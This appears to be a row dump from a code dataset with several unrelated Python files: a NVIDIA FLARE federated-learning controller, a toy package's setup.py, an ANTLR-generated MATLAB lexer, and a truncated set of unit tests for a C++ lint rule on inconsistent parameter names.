content
stringlengths 5
1.05M
|
|---|
# Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from nvflare.apis.client import Client
from nvflare.apis.fl_context import FLContext
from nvflare.apis.impl.controller import ClientTask, Controller, Task
from nvflare.apis.shareable import Shareable
from nvflare.apis.signal import Signal
from nvflare.app_common.abstract.learnable_persistor import LearnablePersistor
from nvflare.app_common.abstract.shareable_generator import ShareableGenerator
from nvflare.app_common.app_constant import AppConstants
class CustomController(Controller):
def __init__(
self,
min_clients: int,
num_rounds: int,
persistor_id="persistor",
shareable_generator_id="shareable_generator",
):
Controller.__init__(self)
self.persistor_id = persistor_id
self.shareable_generator_id = shareable_generator_id
self.persistor = None
self.shareable_gen = None
# config data
self._min_clients = min_clients
self._num_rounds = num_rounds
# workflow phases: init, train
self._phase = "init"
self._global_model = None
def start_controller(self, fl_ctx: FLContext):
self._phase = "init"
engine = fl_ctx.get_engine()
self.shareable_gen = engine.get_component(self.shareable_generator_id)
if not isinstance(self.shareable_gen, ShareableGenerator):
self.system_panic("shareable_gen should be an instance of ShareableGenerator.", fl_ctx)
self.persistor = engine.get_component(self.persistor_id)
if not isinstance(self.persistor, LearnablePersistor):
self.system_panic("persistor should be an instance of LearnablePersistor.", fl_ctx)
self._global_model = self.persistor.load(fl_ctx)
fl_ctx.set_prop(AppConstants.GLOBAL_MODEL, self._global_model, private=True, sticky=True)
def _prepare_training_ctx(self, client_task: ClientTask, fl_ctx: FLContext):
task = client_task.task
fl_ctx.set_prop("current_round", task.props["round"], private=False)
fl_ctx.set_prop("total_rounds", task.props["total"], private=False)
def _process_training_result(self, client_task: ClientTask, fl_ctx: FLContext):
task = client_task.task
task.data = client_task.result
def process_result_of_unknown_task(
self,
client: Client,
task_name: str,
client_task_id: str,
result: Shareable,
fl_ctx: FLContext,
):
return None
def control_flow(self, abort_signal: Signal, fl_ctx: FLContext):
self._phase = "train"
engine = fl_ctx.get_engine()
# No rounds - will remove later
for r in range(self._num_rounds):
if not abort_signal:
return
task = Task(
name="poc",
data=self.shareable_gen.learnable_to_shareable(self._global_model, fl_ctx),
props={"round": r, "total": self._num_rounds},
timeout=0,
before_task_sent_cb=self._prepare_training_ctx,
result_received_cb=self._process_training_result,
)
client_list = engine.get_clients()
for c in client_list:
self.log_info(fl_ctx, f"@@@ client name {c.name}")
self.log_info(fl_ctx, f"@@@ Broadcast and wait {task.name}")
self.broadcast_and_wait(
task=task,
fl_ctx=fl_ctx,
targets=None,
min_responses=0,
abort_signal=abort_signal,
)
self.log_info(fl_ctx, f"@@@ Broadcast and wait - end {task.name}")
self._global_model = self.shareable_gen.shareable_to_learnable(task.data, fl_ctx)
self.persistor.save(self._global_model, fl_ctx)
self.logger.info("model saved")
def stop_controller(self, fl_ctx: FLContext):
self._phase = "finished"
|
#! /usr/bin/env python
import os
import sys
import setuptools
def load_version():
"""Executes toy_pkg/version.py in a globals dictionary and return it."""
globals_dict = {}
with open(os.path.join('toy_pkg', 'version.py')) as fp:
exec(fp.read(), globals_dict)
return globals_dict
def is_installing():
# Allow command-lines such as "python setup.py build install"
install_commands = set(['install', 'develop'])
return install_commands.intersection(set(sys.argv))
def list_required_packages():
required_packages = []
required_packages_orig = ['%s>=%s' % (mod, meta['min_version'])
for mod, meta
in _VERSION_GLOBALS['REQUIRED_MODULE_METADATA']
]
for package in required_packages_orig:
if package.startswith('sklearn'):
package = package.replace('sklearn', 'scikit-learn')
required_packages.append(package)
return required_packages
# Make sources available using relative paths from this file's directory.
os.chdir(os.path.dirname(os.path.abspath(__file__)))
_VERSION_GLOBALS = load_version()
DISTNAME = 'toy_pkg'
DESCRIPTION = 'A small and useless example package'
with open('README.rst') as fp:
LONG_DESCRIPTION = fp.read()
MAINTAINER = 'Nicolas Gensollen'
MAINTAINER_EMAIL = 'nicolas.gensollen@gmail.com'
URL = 'http://github.com/NicolasGensollen/toy_pkg'
LICENSE = 'none'
DOWNLOAD_URL = 'http://github.com/NicolasGensollen/toy_pkg'
VERSION = _VERSION_GLOBALS['__version__']
if __name__ == "__main__":
if is_installing():
module_check_fn = _VERSION_GLOBALS['_check_module_dependencies']
module_check_fn(is_toy_pkg_installing=True)
setuptools.setup(
name=DISTNAME,
maintainer=MAINTAINER,
maintainer_email=MAINTAINER_EMAIL,
description=DESCRIPTION,
license=LICENSE,
url=URL,
version=VERSION,
download_url=DOWNLOAD_URL,
long_description=LONG_DESCRIPTION,
zip_safe=False,
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
packages=setuptools.find_packages(),
install_requires=list_required_packages(),
python_requires='>=3.6',
)
|
# Generated from MATLABLexer.g4 by ANTLR 4.7.2
from antlr4 import *
from io import StringIO
from typing.io import TextIO
import sys
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\2>")
buf.write("\u01a4\b\1\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7")
buf.write("\t\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r")
buf.write("\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23")
buf.write("\t\23\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30")
buf.write("\4\31\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36")
buf.write("\t\36\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%")
buf.write("\4&\t&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.")
buf.write("\t.\4/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64")
buf.write("\t\64\4\65\t\65\4\66\t\66\4\67\t\67\48\t8\49\t9\4:\t:")
buf.write("\4;\t;\4<\t<\4=\t=\4>\t>\4?\t?\4@\t@\4A\tA\4B\tB\3\2\3")
buf.write("\2\3\2\3\2\3\2\3\2\3\2\3\2\3\2\3\3\3\3\3\3\3\3\3\3\3\3")
buf.write("\3\3\3\3\3\3\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3\4\3")
buf.write("\4\3\5\3\5\3\5\3\5\3\5\3\5\3\5\3\5\3\6\3\6\3\6\3\6\3\7")
buf.write("\3\7\3\7\3\b\3\b\3\b\3\b\3\b\3\b\3\b\3\t\3\t\3\t\3\t\3")
buf.write("\t\3\n\3\n\3\n\3\n\3\n\3\n\3\13\3\13\3\13\3\13\3\f\3\f")
buf.write("\3\f\3\f\3\f\3\f\3\f\3\r\3\r\3\r\3\r\3\r\3\16\3\16\3\16")
buf.write("\3\16\3\16\3\16\3\16\3\16\3\16\3\16\3\17\3\17\3\17\3\17")
buf.write("\3\17\3\17\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20\3\20")
buf.write("\3\21\3\21\3\21\3\21\3\21\3\21\3\21\3\22\3\22\3\22\3\22")
buf.write("\3\22\3\22\3\23\3\23\3\24\3\24\3\24\3\25\3\25\3\25\3\26")
buf.write("\3\26\3\27\3\27\3\30\3\30\3\30\3\31\3\31\3\31\3\32\3\32")
buf.write("\3\33\3\33\3\34\3\34\3\35\3\35\3\36\3\36\3\37\3\37\3\37")
buf.write("\3 \3 \3 \3!\3!\3\"\3\"\3#\3#\3$\3$\3%\3%\3&\3&\3&\3\'")
buf.write("\3\'\3(\3(\3)\3)\3)\3*\3*\3*\3+\3+\3+\3,\3,\3-\3-\3.\3")
buf.write(".\3/\3/\3/\3\60\3\60\3\61\3\61\3\62\5\62\u0144\n\62\3")
buf.write("\62\3\62\3\63\3\63\3\63\3\63\3\64\3\64\5\64\u014e\n\64")
buf.write("\3\64\7\64\u0151\n\64\f\64\16\64\u0154\13\64\3\64\3\64")
buf.write("\3\64\3\64\3\65\3\65\3\66\3\66\3\67\3\67\3\67\38\68\u0162")
buf.write("\n8\r8\168\u0163\39\69\u0167\n9\r9\169\u0168\39\39\79")
buf.write("\u016d\n9\f9\169\u0170\139\39\39\69\u0174\n9\r9\169\u0175")
buf.write("\59\u0178\n9\3:\3:\5:\u017c\n:\3:\3:\3:\3;\3;\3;\3;\7")
buf.write(";\u0185\n;\f;\16;\u0188\13;\3<\3<\3<\7<\u018d\n<\f<\16")
buf.write("<\u0190\13<\3<\3<\3=\3=\3>\3>\3?\3?\3@\3@\3A\6A\u019d")
buf.write("\nA\rA\16A\u019e\3A\3A\3B\3B\4\u0152\u018e\2C\3\3\5\4")
buf.write("\7\5\t\6\13\7\r\b\17\t\21\n\23\13\25\f\27\r\31\16\33\17")
buf.write("\35\20\37\21!\22#\23%\24\'\25)\26+\27-\30/\31\61\32\63")
buf.write("\33\65\34\67\359\36;\37= ?!A\"C#E$G%I&K\'M(O)Q*S+U,W-")
buf.write("Y.[/]\60_\61a\62c\63e\2g\64i\2k\2m\2o\65q\66s\67u8w9y")
buf.write(":{;}<\177=\u0081>\u0083\2\3\2\5\4\2C\\c|\3\2\62;\4\2\13")
buf.write("\13\"\"\2\u01ad\2\3\3\2\2\2\2\5\3\2\2\2\2\7\3\2\2\2\2")
buf.write("\t\3\2\2\2\2\13\3\2\2\2\2\r\3\2\2\2\2\17\3\2\2\2\2\21")
buf.write("\3\2\2\2\2\23\3\2\2\2\2\25\3\2\2\2\2\27\3\2\2\2\2\31\3")
buf.write("\2\2\2\2\33\3\2\2\2\2\35\3\2\2\2\2\37\3\2\2\2\2!\3\2\2")
buf.write("\2\2#\3\2\2\2\2%\3\2\2\2\2\'\3\2\2\2\2)\3\2\2\2\2+\3\2")
buf.write("\2\2\2-\3\2\2\2\2/\3\2\2\2\2\61\3\2\2\2\2\63\3\2\2\2\2")
buf.write("\65\3\2\2\2\2\67\3\2\2\2\29\3\2\2\2\2;\3\2\2\2\2=\3\2")
buf.write("\2\2\2?\3\2\2\2\2A\3\2\2\2\2C\3\2\2\2\2E\3\2\2\2\2G\3")
buf.write("\2\2\2\2I\3\2\2\2\2K\3\2\2\2\2M\3\2\2\2\2O\3\2\2\2\2Q")
buf.write("\3\2\2\2\2S\3\2\2\2\2U\3\2\2\2\2W\3\2\2\2\2Y\3\2\2\2\2")
buf.write("[\3\2\2\2\2]\3\2\2\2\2_\3\2\2\2\2a\3\2\2\2\2c\3\2\2\2")
buf.write("\2g\3\2\2\2\2o\3\2\2\2\2q\3\2\2\2\2s\3\2\2\2\2u\3\2\2")
buf.write("\2\2w\3\2\2\2\2y\3\2\2\2\2{\3\2\2\2\2}\3\2\2\2\2\177\3")
buf.write("\2\2\2\2\u0081\3\2\2\2\3\u0085\3\2\2\2\5\u008e\3\2\2\2")
buf.write("\7\u0097\3\2\2\2\t\u00a2\3\2\2\2\13\u00aa\3\2\2\2\r\u00ae")
buf.write("\3\2\2\2\17\u00b1\3\2\2\2\21\u00b8\3\2\2\2\23\u00bd\3")
buf.write("\2\2\2\25\u00c3\3\2\2\2\27\u00c7\3\2\2\2\31\u00ce\3\2")
buf.write("\2\2\33\u00d3\3\2\2\2\35\u00dd\3\2\2\2\37\u00e3\3\2\2")
buf.write("\2!\u00ec\3\2\2\2#\u00f3\3\2\2\2%\u00f9\3\2\2\2\'\u00fb")
buf.write("\3\2\2\2)\u00fe\3\2\2\2+\u0101\3\2\2\2-\u0103\3\2\2\2")
buf.write("/\u0105\3\2\2\2\61\u0108\3\2\2\2\63\u010b\3\2\2\2\65\u010d")
buf.write("\3\2\2\2\67\u010f\3\2\2\29\u0111\3\2\2\2;\u0113\3\2\2")
buf.write("\2=\u0115\3\2\2\2?\u0118\3\2\2\2A\u011b\3\2\2\2C\u011d")
buf.write("\3\2\2\2E\u011f\3\2\2\2G\u0121\3\2\2\2I\u0123\3\2\2\2")
buf.write("K\u0125\3\2\2\2M\u0128\3\2\2\2O\u012a\3\2\2\2Q\u012c\3")
buf.write("\2\2\2S\u012f\3\2\2\2U\u0132\3\2\2\2W\u0135\3\2\2\2Y\u0137")
buf.write("\3\2\2\2[\u0139\3\2\2\2]\u013b\3\2\2\2_\u013e\3\2\2\2")
buf.write("a\u0140\3\2\2\2c\u0143\3\2\2\2e\u0147\3\2\2\2g\u014d\3")
buf.write("\2\2\2i\u0159\3\2\2\2k\u015b\3\2\2\2m\u015d\3\2\2\2o\u0161")
buf.write("\3\2\2\2q\u0177\3\2\2\2s\u017b\3\2\2\2u\u0180\3\2\2\2")
buf.write("w\u0189\3\2\2\2y\u0193\3\2\2\2{\u0195\3\2\2\2}\u0197\3")
buf.write("\2\2\2\177\u0199\3\2\2\2\u0081\u019c\3\2\2\2\u0083\u01a2")
buf.write("\3\2\2\2\u0085\u0086\7h\2\2\u0086\u0087\7w\2\2\u0087\u0088")
buf.write("\7p\2\2\u0088\u0089\7e\2\2\u0089\u008a\7v\2\2\u008a\u008b")
buf.write("\7k\2\2\u008b\u008c\7q\2\2\u008c\u008d\7p\2\2\u008d\4")
buf.write("\3\2\2\2\u008e\u008f\7e\2\2\u008f\u0090\7n\2\2\u0090\u0091")
buf.write("\7c\2\2\u0091\u0092\7u\2\2\u0092\u0093\7u\2\2\u0093\u0094")
buf.write("\7f\2\2\u0094\u0095\7g\2\2\u0095\u0096\7h\2\2\u0096\6")
buf.write("\3\2\2\2\u0097\u0098\7r\2\2\u0098\u0099\7t\2\2\u0099\u009a")
buf.write("\7q\2\2\u009a\u009b\7r\2\2\u009b\u009c\7g\2\2\u009c\u009d")
buf.write("\7t\2\2\u009d\u009e\7v\2\2\u009e\u009f\7k\2\2\u009f\u00a0")
buf.write("\7g\2\2\u00a0\u00a1\7u\2\2\u00a1\b\3\2\2\2\u00a2\u00a3")
buf.write("\7o\2\2\u00a3\u00a4\7g\2\2\u00a4\u00a5\7v\2\2\u00a5\u00a6")
buf.write("\7j\2\2\u00a6\u00a7\7q\2\2\u00a7\u00a8\7f\2\2\u00a8\u00a9")
buf.write("\7u\2\2\u00a9\n\3\2\2\2\u00aa\u00ab\7g\2\2\u00ab\u00ac")
buf.write("\7p\2\2\u00ac\u00ad\7f\2\2\u00ad\f\3\2\2\2\u00ae\u00af")
buf.write("\7k\2\2\u00af\u00b0\7h\2\2\u00b0\16\3\2\2\2\u00b1\u00b2")
buf.write("\7g\2\2\u00b2\u00b3\7n\2\2\u00b3\u00b4\7u\2\2\u00b4\u00b5")
buf.write("\7g\2\2\u00b5\u00b6\7k\2\2\u00b6\u00b7\7h\2\2\u00b7\20")
buf.write("\3\2\2\2\u00b8\u00b9\7g\2\2\u00b9\u00ba\7n\2\2\u00ba\u00bb")
buf.write("\7u\2\2\u00bb\u00bc\7g\2\2\u00bc\22\3\2\2\2\u00bd\u00be")
buf.write("\7y\2\2\u00be\u00bf\7j\2\2\u00bf\u00c0\7k\2\2\u00c0\u00c1")
buf.write("\7n\2\2\u00c1\u00c2\7g\2\2\u00c2\24\3\2\2\2\u00c3\u00c4")
buf.write("\7h\2\2\u00c4\u00c5\7q\2\2\u00c5\u00c6\7t\2\2\u00c6\26")
buf.write("\3\2\2\2\u00c7\u00c8\7u\2\2\u00c8\u00c9\7y\2\2\u00c9\u00ca")
buf.write("\7k\2\2\u00ca\u00cb\7v\2\2\u00cb\u00cc\7e\2\2\u00cc\u00cd")
buf.write("\7j\2\2\u00cd\30\3\2\2\2\u00ce\u00cf\7e\2\2\u00cf\u00d0")
buf.write("\7c\2\2\u00d0\u00d1\7u\2\2\u00d1\u00d2\7g\2\2\u00d2\32")
buf.write("\3\2\2\2\u00d3\u00d4\7q\2\2\u00d4\u00d5\7v\2\2\u00d5\u00d6")
buf.write("\7j\2\2\u00d6\u00d7\7g\2\2\u00d7\u00d8\7t\2\2\u00d8\u00d9")
buf.write("\7y\2\2\u00d9\u00da\7k\2\2\u00da\u00db\7u\2\2\u00db\u00dc")
buf.write("\7g\2\2\u00dc\34\3\2\2\2\u00dd\u00de\7d\2\2\u00de\u00df")
buf.write("\7t\2\2\u00df\u00e0\7g\2\2\u00e0\u00e1\7c\2\2\u00e1\u00e2")
buf.write("\7m\2\2\u00e2\36\3\2\2\2\u00e3\u00e4\7e\2\2\u00e4\u00e5")
buf.write("\7q\2\2\u00e5\u00e6\7p\2\2\u00e6\u00e7\7v\2\2\u00e7\u00e8")
buf.write("\7k\2\2\u00e8\u00e9\7p\2\2\u00e9\u00ea\7w\2\2\u00ea\u00eb")
buf.write("\7g\2\2\u00eb \3\2\2\2\u00ec\u00ed\7t\2\2\u00ed\u00ee")
buf.write("\7g\2\2\u00ee\u00ef\7v\2\2\u00ef\u00f0\7w\2\2\u00f0\u00f1")
buf.write("\7t\2\2\u00f1\u00f2\7p\2\2\u00f2\"\3\2\2\2\u00f3\u00f4")
buf.write("\7e\2\2\u00f4\u00f5\7n\2\2\u00f5\u00f6\7g\2\2\u00f6\u00f7")
buf.write("\7c\2\2\u00f7\u00f8\7t\2\2\u00f8$\3\2\2\2\u00f9\u00fa")
buf.write("\7?\2\2\u00fa&\3\2\2\2\u00fb\u00fc\7?\2\2\u00fc\u00fd")
buf.write("\7?\2\2\u00fd(\3\2\2\2\u00fe\u00ff\7\u0080\2\2\u00ff\u0100")
buf.write("\7?\2\2\u0100*\3\2\2\2\u0101\u0102\7@\2\2\u0102,\3\2\2")
buf.write("\2\u0103\u0104\7>\2\2\u0104.\3\2\2\2\u0105\u0106\7@\2")
buf.write("\2\u0106\u0107\7?\2\2\u0107\60\3\2\2\2\u0108\u0109\7>")
buf.write("\2\2\u0109\u010a\7?\2\2\u010a\62\3\2\2\2\u010b\u010c\7")
buf.write("-\2\2\u010c\64\3\2\2\2\u010d\u010e\7/\2\2\u010e\66\3\2")
buf.write("\2\2\u010f\u0110\7\60\2\2\u01108\3\2\2\2\u0111\u0112\7")
buf.write("(\2\2\u0112:\3\2\2\2\u0113\u0114\7~\2\2\u0114<\3\2\2\2")
buf.write("\u0115\u0116\7(\2\2\u0116\u0117\7(\2\2\u0117>\3\2\2\2")
buf.write("\u0118\u0119\7~\2\2\u0119\u011a\7~\2\2\u011a@\3\2\2\2")
buf.write("\u011b\u011c\7*\2\2\u011cB\3\2\2\2\u011d\u011e\7+\2\2")
buf.write("\u011eD\3\2\2\2\u011f\u0120\7}\2\2\u0120F\3\2\2\2\u0121")
buf.write("\u0122\7]\2\2\u0122H\3\2\2\2\u0123\u0124\7,\2\2\u0124")
buf.write("J\3\2\2\2\u0125\u0126\7\60\2\2\u0126\u0127\7,\2\2\u0127")
buf.write("L\3\2\2\2\u0128\u0129\7\61\2\2\u0129N\3\2\2\2\u012a\u012b")
buf.write("\7^\2\2\u012bP\3\2\2\2\u012c\u012d\7\60\2\2\u012d\u012e")
buf.write("\7\61\2\2\u012eR\3\2\2\2\u012f\u0130\7\60\2\2\u0130\u0131")
buf.write("\7^\2\2\u0131T\3\2\2\2\u0132\u0133\7\60\2\2\u0133\u0134")
buf.write("\7`\2\2\u0134V\3\2\2\2\u0135\u0136\7`\2\2\u0136X\3\2\2")
buf.write("\2\u0137\u0138\7\u0080\2\2\u0138Z\3\2\2\2\u0139\u013a")
buf.write("\7<\2\2\u013a\\\3\2\2\2\u013b\u013c\7\60\2\2\u013c\u013d")
buf.write("\7)\2\2\u013d^\3\2\2\2\u013e\u013f\7)\2\2\u013f`\3\2\2")
buf.write("\2\u0140\u0141\7B\2\2\u0141b\3\2\2\2\u0142\u0144\7\17")
buf.write("\2\2\u0143\u0142\3\2\2\2\u0143\u0144\3\2\2\2\u0144\u0145")
buf.write("\3\2\2\2\u0145\u0146\7\f\2\2\u0146d\3\2\2\2\u0147\u0148")
buf.write("\7\60\2\2\u0148\u0149\7\60\2\2\u0149\u014a\7\60\2\2\u014a")
buf.write("f\3\2\2\2\u014b\u014e\7\'\2\2\u014c\u014e\5e\63\2\u014d")
buf.write("\u014b\3\2\2\2\u014d\u014c\3\2\2\2\u014e\u0152\3\2\2\2")
buf.write("\u014f\u0151\13\2\2\2\u0150\u014f\3\2\2\2\u0151\u0154")
buf.write("\3\2\2\2\u0152\u0153\3\2\2\2\u0152\u0150\3\2\2\2\u0153")
buf.write("\u0155\3\2\2\2\u0154\u0152\3\2\2\2\u0155\u0156\5c\62\2")
buf.write("\u0156\u0157\3\2\2\2\u0157\u0158\b\64\2\2\u0158h\3\2\2")
buf.write("\2\u0159\u015a\t\2\2\2\u015aj\3\2\2\2\u015b\u015c\t\3")
buf.write("\2\2\u015cl\3\2\2\2\u015d\u015e\7)\2\2\u015e\u015f\7)")
buf.write("\2\2\u015fn\3\2\2\2\u0160\u0162\5k\66\2\u0161\u0160\3")
buf.write("\2\2\2\u0162\u0163\3\2\2\2\u0163\u0161\3\2\2\2\u0163\u0164")
buf.write("\3\2\2\2\u0164p\3\2\2\2\u0165\u0167\5k\66\2\u0166\u0165")
buf.write("\3\2\2\2\u0167\u0168\3\2\2\2\u0168\u0166\3\2\2\2\u0168")
buf.write("\u0169\3\2\2\2\u0169\u016a\3\2\2\2\u016a\u016e\7\60\2")
buf.write("\2\u016b\u016d\5k\66\2\u016c\u016b\3\2\2\2\u016d\u0170")
buf.write("\3\2\2\2\u016e\u016c\3\2\2\2\u016e\u016f\3\2\2\2\u016f")
buf.write("\u0178\3\2\2\2\u0170\u016e\3\2\2\2\u0171\u0173\7\60\2")
buf.write("\2\u0172\u0174\5k\66\2\u0173\u0172\3\2\2\2\u0174\u0175")
buf.write("\3\2\2\2\u0175\u0173\3\2\2\2\u0175\u0176\3\2\2\2\u0176")
buf.write("\u0178\3\2\2\2\u0177\u0166\3\2\2\2\u0177\u0171\3\2\2\2")
buf.write("\u0178r\3\2\2\2\u0179\u017c\5o8\2\u017a\u017c\5q9\2\u017b")
buf.write("\u0179\3\2\2\2\u017b\u017a\3\2\2\2\u017c\u017d\3\2\2\2")
buf.write("\u017d\u017e\7g\2\2\u017e\u017f\5o8\2\u017ft\3\2\2\2\u0180")
buf.write("\u0186\5i\65\2\u0181\u0185\5i\65\2\u0182\u0185\5k\66\2")
buf.write("\u0183\u0185\7a\2\2\u0184\u0181\3\2\2\2\u0184\u0182\3")
buf.write("\2\2\2\u0184\u0183\3\2\2\2\u0185\u0188\3\2\2\2\u0186\u0184")
buf.write("\3\2\2\2\u0186\u0187\3\2\2\2\u0187v\3\2\2\2\u0188\u0186")
buf.write("\3\2\2\2\u0189\u018e\7)\2\2\u018a\u018d\5m\67\2\u018b")
buf.write("\u018d\13\2\2\2\u018c\u018a\3\2\2\2\u018c\u018b\3\2\2")
buf.write("\2\u018d\u0190\3\2\2\2\u018e\u018f\3\2\2\2\u018e\u018c")
buf.write("\3\2\2\2\u018f\u0191\3\2\2\2\u0190\u018e\3\2\2\2\u0191")
buf.write("\u0192\7)\2\2\u0192x\3\2\2\2\u0193\u0194\7_\2\2\u0194")
buf.write("z\3\2\2\2\u0195\u0196\7\177\2\2\u0196|\3\2\2\2\u0197\u0198")
buf.write("\7.\2\2\u0198~\3\2\2\2\u0199\u019a\7=\2\2\u019a\u0080")
buf.write("\3\2\2\2\u019b\u019d\5\u0083B\2\u019c\u019b\3\2\2\2\u019d")
buf.write("\u019e\3\2\2\2\u019e\u019c\3\2\2\2\u019e\u019f\3\2\2\2")
buf.write("\u019f\u01a0\3\2\2\2\u01a0\u01a1\bA\2\2\u01a1\u0082\3")
buf.write("\2\2\2\u01a2\u01a3\t\4\2\2\u01a3\u0084\3\2\2\2\21\2\u0143")
buf.write("\u014d\u0152\u0163\u0168\u016e\u0175\u0177\u017b\u0184")
buf.write("\u0186\u018c\u018e\u019e\3\b\2\2")
return buf.getvalue()
class MATLABLexer(Lexer):
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
FUNCTION = 1
CLASSDEF = 2
PROPERTIES = 3
METHODS = 4
END = 5
IF = 6
ELSEIF = 7
ELSE = 8
WHILE = 9
FOR = 10
SWITCH = 11
CASE = 12
OTHERWISE = 13
BREAK = 14
CONTINUE = 15
RETURN = 16
CLEAR = 17
EQUALS = 18
EQUALTO = 19
NOTEQUALTO = 20
GT = 21
LT = 22
GE = 23
LE = 24
PLUS = 25
MINUS = 26
DOT = 27
VECAND = 28
VECOR = 29
SCALAND = 30
SCALOR = 31
LPAREN = 32
RPAREN = 33
LBRACE = 34
LBRACK = 35
MTIMES = 36
TIMES = 37
RDIVIDE = 38
LDIVIDE = 39
MRDIVIDE = 40
MLDIVIDE = 41
POW = 42
MPOW = 43
NOT = 44
COLON = 45
TRANS = 46
CTRANS = 47
FUNC_HANDLE = 48
NL = 49
COMMENT = 50
INT = 51
FLOAT = 52
SCI = 53
ID = 54
STRING = 55
RBRACK = 56
RBRACE = 57
COMMA = 58
SEMI = 59
WS = 60
channelNames = [ u"DEFAULT_TOKEN_CHANNEL", u"HIDDEN" ]
modeNames = [ "DEFAULT_MODE" ]
literalNames = [ "<INVALID>",
"'function'", "'classdef'", "'properties'", "'methods'", "'end'",
"'if'", "'elseif'", "'else'", "'while'", "'for'", "'switch'",
"'case'", "'otherwise'", "'break'", "'continue'", "'return'",
"'clear'", "'='", "'=='", "'~='", "'>'", "'<'", "'>='", "'<='",
"'+'", "'-'", "'.'", "'&'", "'|'", "'&&'", "'||'", "'('", "')'",
"'{'", "'['", "'*'", "'.*'", "'/'", "'\\'", "'./'", "'.\\'",
"'.^'", "'^'", "'~'", "':'", "'.''", "'''", "'@'", "']'", "'}'",
"','", "';'" ]
symbolicNames = [ "<INVALID>",
"FUNCTION", "CLASSDEF", "PROPERTIES", "METHODS", "END", "IF",
"ELSEIF", "ELSE", "WHILE", "FOR", "SWITCH", "CASE", "OTHERWISE",
"BREAK", "CONTINUE", "RETURN", "CLEAR", "EQUALS", "EQUALTO",
"NOTEQUALTO", "GT", "LT", "GE", "LE", "PLUS", "MINUS", "DOT",
"VECAND", "VECOR", "SCALAND", "SCALOR", "LPAREN", "RPAREN",
"LBRACE", "LBRACK", "MTIMES", "TIMES", "RDIVIDE", "LDIVIDE",
"MRDIVIDE", "MLDIVIDE", "POW", "MPOW", "NOT", "COLON", "TRANS",
"CTRANS", "FUNC_HANDLE", "NL", "COMMENT", "INT", "FLOAT", "SCI",
"ID", "STRING", "RBRACK", "RBRACE", "COMMA", "SEMI", "WS" ]
ruleNames = [ "FUNCTION", "CLASSDEF", "PROPERTIES", "METHODS", "END",
"IF", "ELSEIF", "ELSE", "WHILE", "FOR", "SWITCH", "CASE",
"OTHERWISE", "BREAK", "CONTINUE", "RETURN", "CLEAR", "EQUALS",
"EQUALTO", "NOTEQUALTO", "GT", "LT", "GE", "LE", "PLUS",
"MINUS", "DOT", "VECAND", "VECOR", "SCALAND", "SCALOR",
"LPAREN", "RPAREN", "LBRACE", "LBRACK", "MTIMES", "TIMES",
"RDIVIDE", "LDIVIDE", "MRDIVIDE", "MLDIVIDE", "POW", "MPOW",
"NOT", "COLON", "TRANS", "CTRANS", "FUNC_HANDLE", "NL",
"LINECONTINUE", "COMMENT", "LETTER", "DIGIT", "ESC", "INT",
"FLOAT", "SCI", "ID", "STRING", "RBRACK", "RBRACE", "COMMA",
"SEMI", "WS", "SPACE" ]
grammarFileName = "MATLABLexer.g4"
def __init__(self, input=None, output:TextIO = sys.stdout):
super().__init__(input, output)
self.checkVersion("4.7.2")
self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())
self._actions = None
self._predicates = None
|
import test_support
class InconsistentDeclarationParameterNameRuleTest(test_support.TestBase):
def setUp(self):
self.set_default_rules_selection(['InconsistentDeclarationParameterNameRule'])
self.set_default_error_id('inconsistent declaration parameter name')
self.set_default_error_severity('style')
def test_only_function_declaration(self):
self.assert_colobot_lint_result(
source_file_lines = [
'void Foo(int a, int b, int c);'
],
expected_errors = [])
def test_only_function_definition(self):
self.assert_colobot_lint_result(
source_file_lines = [
'void Foo(int a, int b, int c) {}'
],
expected_errors = [])
def test_function_declaration_with_empty_parameter_names_and_function_definition(self):
self.assert_colobot_lint_result(
source_file_lines = [
'void Foo(int, int, int);',
'void Foo(int a, int b, int c) {}'
],
expected_errors = [])
def test_function_declaration_and_function_definition_with_empty_parameter_names(self):
self.assert_colobot_lint_result(
source_file_lines = [
'void Foo(int a, int b, int c);',
'void Foo(int, int, int) {}'
],
expected_errors = [])
def test_function_declaration_and_function_definition_with_inconsistent_parameter_names(self):
self.assert_colobot_lint_result(
source_file_lines = [
'void Foo(int a, int b, int c);',
'void Foo(int x, int y, int z) {}'
],
expected_errors = [
{
'msg': "Function 'Foo' has other declaration(s) with inconsistently named parameter(s)",
'line': '1'
}
])
def test_multiple_function_declarations_and_function_definition_with_inconsistent_parameter_names(self):
self.assert_colobot_lint_result(
source_file_lines = [
'void Foo(int a, int b, int c);',
'void Foo(int d, int e, int f);',
'void Foo(int x, int y, int z) {}'
],
expected_errors = [
{
'msg': "Function 'Foo' has other declaration(s) with inconsistently named parameter(s)",
'line': '1'
}
])
def test_class_method_declaration_and_definition(self):
self.assert_colobot_lint_result(
source_file_lines = [
'struct Foo',
'{',
' void Bar(int a, int b, int c);',
'};'
'void Foo::Bar(int a, int b, int c) {}',
],
expected_errors = [])
def test_class_method_declaration_and_definition_inconsistent_parameter_names(self):
self.assert_colobot_lint_result(
source_file_lines = [
'struct Foo',
'{',
' void Bar(int a, int b, int c);',
'};'
